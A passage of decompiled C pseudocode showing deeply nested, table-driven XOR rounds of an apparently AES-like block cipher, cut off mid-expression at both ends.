4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4151d0 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x18) * 4) ^  *(0x4151d0 + (_t243 & 0x000000ff) * 4) ^ _t257[5]) >> 0x18) * 4) ^  *(0x4151d0 + (_t162 & 0x000000ff) * 4) ^ _t257[6];
						_t259 = _t259 - 0x20;
						_t167 =  *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  *(0x4151d0 + (_t238 & 0x000000ff) * 4) ^ _t257[3]) >> 0x18) * 4) ^  *(0x4151d0 + (_t157 & 0x000000ff) * 4) ^ _t257[4]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + (( *(0x4159d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + (( *(0x4159d0 + ((_t98 ^ _t257[1]) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x4155d0 + ((_t98 ^ _t257[1]) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x415dd0 + ((_t98 ^ _t257[1]) >> 0x18) * 4) ^  *(0x4151d0 + (_t105 & 0x000000ff) * 4) ^ _t257[2]) >> 0x18) * 4) ^  